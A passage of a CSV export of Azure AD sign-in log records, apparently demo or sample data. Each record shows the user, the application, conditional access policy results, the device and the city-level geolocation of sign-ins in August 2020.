'2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",cbc0f99c-7bef-40f5-9b26-c77dbfbf1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,cbc0f99c-7bef-40f5-9b26-c77dbfbf1800,SigninLogs,Sucess,41.90428925,-85.99833679
+1821,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:08.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ffa4a83a-77af-4817-9710-2f4393198e66,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",134c741e-1983-4152-9e8f-71880c8c1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,134c741e-1983-4152-9e8f-71880c8c1700,SigninLogs,Sucess,36.6404686,-78.26995087
+1822,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:00.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:10,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",ae523e23-b4fa-4218-8bfd-48653bd84d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ae523e23-b4fa-4218-8bfd-48653bd84d00,SigninLogs,Sucess,35.01296997,-80.93171692
+1823,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:10.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fb8d9af1-13b4-4b76-85cc-310d7038453f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1fc6d415-116e-44c9-a4fc-b8ef7d6f1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1fc6d415-116e-44c9-a4fc-b8ef7d6f1700,SigninLogs,Sucess,41.90428925,-85.99833679
+1824,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:27.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b20667a-d596-4083-8612-59831155443b,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eabd1251800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,3b0e5c51-5aba-4adb-89c0-6eabd1251800,SigninLogs,Sucess,41.90428925,-85.99833679
+1825,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7b8d0704-527d-43b3-a82a-75b06ed74d5f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eab27261800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,3b0e5c51-5aba-4adb-89c0-6eab27261800,SigninLogs,Sucess,41.90428925,-85.99833679
+1826,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:08.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ffa4a83a-77af-4817-9710-2f4393198e66,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",134c741e-1983-4152-9e8f-71880c8c1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,134c741e-1983-4152-9e8f-71880c8c1700,SigninLogs,Sucess,36.6404686,-78.26995087
+1827,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:05.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5e71f6c7-9aa3-49e2-8adc-bea9ec40665b,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",86807d56-c656-4319-9bdc-577e53f91600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,86807d56-c656-4319-9bdc-577e53f91600,SigninLogs,Sucess,41.90428925,-85.99833679
+1828,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:27.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b20667a-d596-4083-8612-59831155443b,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 